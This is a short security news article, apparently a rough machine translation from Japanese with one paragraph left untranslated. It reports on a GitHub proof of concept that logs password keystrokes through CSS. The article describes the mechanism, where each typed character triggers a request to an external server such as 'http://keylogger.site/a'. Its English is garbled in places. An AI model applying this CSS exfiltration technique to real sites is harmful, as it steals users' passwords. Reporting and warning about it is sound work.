Key logger appears that hacks CSS to steal passwords


ByChristoph Scholz

CSS is a file that specifies the style of a web page such as the color of fonts and parts to use, but a code to steal passwords using only that CSS is published on GitHub.

GitHub - maxchehab / CSS - Keylogging: Chrome extension and Express server that exploits keylogging abilities of CSS.
https://github.com/maxchehab/CSS-Keylogging


仕組みとしては、パスワード欄へ文字が入力されるたびにその末尾の文字を取得し、その文字に応じた画像を外部のサーバーからダウンロードするというもの。例えば「a」と入力された場合は「http://keylogger.site/a」にアクセスするという具合です。アクセスされた外部のサーバーにはアクセス履歴が残るため、そのアクセス履歴を見れば入力されたパスワードが何だったのか判別できるということです。


However, in order to acquire the characters in the password column, the Web page is "ReactIt is necessary to be created using a specific framework such as "In a famous siteFacebookYaInstagramIt corresponds to.

Note that if you enter a password using password manager and password storage function of browser etcreportAlthough it is rising, CSS which can not be trusted for a whileStylishIt seems better to stop applying it yourself using such as.

in Security, Posted by log1d_ts